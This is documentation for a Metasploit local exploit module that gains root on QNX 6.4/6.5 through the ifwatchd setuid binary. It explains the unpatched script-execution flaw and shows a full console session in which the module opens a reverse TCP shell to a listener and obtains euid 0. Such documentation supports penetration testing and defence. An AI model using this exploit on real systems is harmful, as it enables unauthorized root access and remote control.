documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the ifwatchd suid executable.
ifwatchd allows users to specify scripts to execute using the -A
command line argument; however, it does not drop privileges when
executing user-supplied scripts, resulting in execution of arbitrary
commands as root.
This module has been tested successfully on:
QNX Neutrino 6.5.0 Service Pack 1 is available here:
msfconsoleuse exploit/qnx/local/ifwatchd_priv_escset session <ID>runWhich session to use, which can be viewed with sessions
A writable directory file system path. (default: /tmp)
msf > use exploit/qnx/local/ifwatchd_priv_esc
msf exploit(qnx/local/ifwatchd_priv_esc) > set session 1
session => 1
msf exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf exploit(qnx/local/ifwatchd_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing interface arrival event script...
[*] Executing /sbin/ifwatchd...
[*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400
id
uid=100(test) gid=100 euid=0(root)
uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86